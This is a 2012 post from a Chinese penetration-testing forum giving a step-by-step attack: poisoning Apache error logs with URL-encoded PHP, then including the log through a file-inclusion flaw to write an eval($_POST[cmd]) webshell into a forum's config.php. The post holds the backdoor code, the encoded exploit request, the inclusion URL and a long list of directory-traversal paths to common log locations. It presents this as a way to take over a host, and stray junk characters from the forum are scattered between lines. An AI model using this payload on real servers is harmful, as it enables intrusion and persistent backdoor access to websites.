中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
( y/ l# n9 X; v- w
; b5 L1 u5 f( r
比如还是这句一句话木马
- M7 p4 _) n6 c; ^
<?eval($_POST[cmd]);?>
/ q' t* U$ y( I! ]9 B4 {1 X
6 x& E% j+ H% c5 [! }
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
; y6 z' _; Z% z% B
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
" P# J" E% E) k
% T0 F6 d/ ~; }0 ^2 _
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
" k% V) d4 I/ ]! _3 ]- U
fclose($fp);?> //在config.php里写入一句木马语句
+ N& i* O4 |, D7 ~' `) w
1 d& u+ m; u$ c% a
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
( `4 F3 w$ J, ~2 _$ Q
转换为
3 m# p' ]( x/ M- |) r
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
' {! Y0 A/ V, N* z* Z$ b( E
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
0 Q: }5 w0 S% Z9 ?' D% |& B
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
* o& h$ p2 a4 g. C
fclose%28%24fp%29%3B%3F%3E
! U' f) g+ Q, K: B
我们提交
[8 t7 O. k! p: V
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
% Q9 L. h5 ~7 P. _, U# f) K
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
7 `2 ^. t( O' @' }2 g+ M
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
. J5 E) w8 |2 Q# m' h6 U, s
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
/ T% P& b$ W9 z" m0 q" c
% w5 Z0 j. }8 R1 j
这样就错误日志里就记录下了这行写入webshell的代码。
9 b7 C5 P p X0 W) y1 N' C2 e
我们再来包含日志,提交
5 m# o/ _5 _ Z
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
' _4 y% Y' j6 E0 r/ L: }# Y. @6 M
% C, y6 j* k( [7 l1 u3 g7 A# d
这样webshell就写入成功了,config.php里就写入一句木马语句
5 P- i0 Q7 G( M- I0 ^! |
OK.
% P3 U6 i3 p3 @! v' L0 Q8 R* r
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
* ~- L' P/ h" Y
直接用lanker的客户端一连,主机就是你的了。
) j3 X9 i, W! F% F Q7 ?# U
3 R* }5 f7 E, m( G
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
' e2 O% h2 U5 m6 l. J/ c
, G) j, c0 B( T( Q
其他的日志路径,你可以去猜,也可以参照这里。
+ U! r) r5 i% ~+ c/ P; i
../../../../../../../../../../var/log/httpd/access_log
* P0 @0 u* c; u
../../../../../../../../../../var/log/httpd/error_log
* o& ~6 c7 @7 y9 C
../apache/logs/error.log
9 K f) \, J) o$ q, `4 ^7 y+ D
../apache/logs/access.log
; C* U9 \* S+ _" i
../../apache/logs/error.log
% o/ B6 {, Z% `$ L0 C5 v9 z
../../apache/logs/access.log
, k& R; X/ _% v; ?) D
../../../apache/logs/error.log
w6 u2 g$ e9 |* M n/ A9 ~+ q
../../../apache/logs/access.log
5 a" }$ A. d" K/ P1 m. T
../../../../../../../../../../etc/httpd/logs/acces_log
9 G1 M3 } k0 a7 [, j5 N
../../../../../../../../../../etc/httpd/logs/acces.log
% v( U% S# @; W% n2 A* p
../../../../../../../../../../etc/httpd/logs/error_log
- v% ?1 z3 O [ r/ z
../../../../../../../../../../etc/httpd/logs/error.log
: }* y( m$ c/ O5 O8 g
../../../../../../../../../../var/www/logs/access_log
% r3 W1 y. F2 A8 L! t* l/ C6 u: s$ [
../../../../../../../../../../var/www/logs/access.log
( v3 b' l G8 w6 u) V9 Q
../../../../../../../../../../usr/local/apache/logs/access_log
5 n7 R. h$ q# n5 X1 R: q5 n4 v
../../../../../../../../../../usr/local/apache/logs/access.log
. ]( e" X/ R; }& A1 }4 R
../../../../../../../../../../var/log/apache/access_log
, I. [$ g. D& @1 s0 r; h' Y9 c
../../../../../../../../../../var/log/apache/access.log
$ p9 V1 o( U" M0 m. _4 d5 X
../../../../../../../../../../var/log/access_log
0 o; ]7 J% s2 |. Z4 J
../../../../../../../../../../var/www/logs/error_log
* F7 Z& a5 W" D4 P5 w- v
../../../../../../../../../../var/www/logs/error.log
3 U X9 F4 p6 V5 R
../../../../../../../../../../usr/local/apache/logs/error_log
: l+ {9 i# d- H9 P4 x1 L
../../../../../../../../../../usr/local/apache/logs/error.log
; G9 u9 I1 i+ S C6 x+ ^
../../../../../../../../../../var/log/apache/error_log
3 J* c* [) s& `# O$ B& J) Q/ S! p
../../../../../../../../../../var/log/apache/error.log
) o5 ^2 s: \4 m5 D
../../../../../../../../../../var/log/access_log
, M1 H2 E9 e6 }4 G+ Z
../../../../../../../../../../var/log/error_log
0 d4 }! _6 i6 u1 E$ K. x
/var/log/httpd/access_log
5 q5 W8 Z U+ I! Z$ v. W
/var/log/httpd/error_log
- A) S; i9 S8 Q# ^
../apache/logs/error.log
7 M' h1 r" o( K. P% i
../apache/logs/access.log
1 i: M0 J( e3 g3 _
../../apache/logs/error.log
; Y# k) v- ]( H% q% K8 L: u& ?3 r
../../apache/logs/access.log
- I0 E" `2 Z( X% Y+ h! y) Q' l
../../../apache/logs/error.log
' k* U% s$ P; I y3 T
../../../apache/logs/access.log
% d& _0 k1 Z2 M& [% p4 i8 q) o
/etc/httpd/logs/acces_log
' D4 e T5 G. r' B+ W
/etc/httpd/logs/acces.log
$ Z: k6 C0 N o! ~. R7 s; x3 {
/etc/httpd/logs/error_log
- }3 l7 U, t# P
/etc/httpd/logs/error.log
9 I$ M( ?/ Q2 ^9 }6 ]
/var/www/logs/access_log
4 X ?6 [ R/ H* q
/var/www/logs/access.log
+ B5 m- H7 b# x) b6 E) z N
/usr/local/apache/logs/access_log
* V) }3 C! ~9 f& s" ]7 r, t* E+ s
/usr/local/apache/logs/access.log
w% I0 R- h) s% P! L. J
/var/log/apache/access_log
% h# c9 k' X9 j
/var/log/apache/access.log
. r$ [/ W. t7 k
/var/log/access_log
6 Q# J9 j' ~7 t* C2 N
/var/www/logs/error_log
8 ]3 A! H" u6 q5 N& a$ U
/var/www/logs/error.log
% N$ e8 R3 ~* @+ a9 u! E
/usr/local/apache/logs/error_log
& W E* d. f( H% e. @; u! @
/usr/local/apache/logs/error.log
. P( @ R$ X n' j. i3 D# N
/var/log/apache/error_log
: b* d* Y' l; r2 Q- M% Y- N
/var/log/apache/error.log
6 w, a7 m4 E. X% d
/var/log/access_log
5 w2 r( Q$ X4 G- B7 R- w! ?8 R
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2